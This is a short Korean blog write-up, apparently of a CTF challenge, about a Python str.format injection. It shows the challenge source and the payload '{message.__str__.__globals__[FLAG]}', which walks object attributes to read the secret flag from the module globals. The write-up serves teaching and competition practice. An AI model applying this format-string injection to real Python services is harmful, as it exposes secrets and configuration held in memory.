1. 개요
파이썬 포맷 스트링 문제
2. 분석
참고 자료: https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/
포맷 스트링 부분에 {} 중괄호로 삽입가능해보입니다.
import dataclasses
import errno
import os
import random
FLAG = os.environ.get("FLAG")
if not FLAG:
print("If you're running this locally, please create a fake flag env variable.")
print("If you're seeing this on the remote server, please contact the admins.")
exit(errno.ENOENT)
@dataclasses.dataclass
class Message:
message: str
def __str__(self):
return self.message
__repr__ = __str__
MESSAGES = [
Message("Thank you for using our service."),
Message("Here is your pattern:"),
Message("Until next time!")
]
pattern = input("pattern> ")
count = int(input("count> "))
final_pattern = pattern * count
print(f"{{message}} {final_pattern}".format(message=random.choice(MESSAGES)))
다음 코드를 넣으면 플래그를 얻을 수 있습니다.
{message.__str__.__globals__[FLAG]}
'CTF' 카테고리의 다른 글
| [corCTF 2022] whack-a-frog (0) | 2022.08.14 |
|---|---|
| [TFC CTF 2022] BBBBBBBBBB (0) | 2022.08.07 |
| [TFC CTF 2022] random (0) | 2022.07.31 |
| [TFC CTF 2022] CALENDAR (0) | 2022.07.31 |
| [TFC CTF 2022] DEEPLINKS (0) | 2022.07.31 |
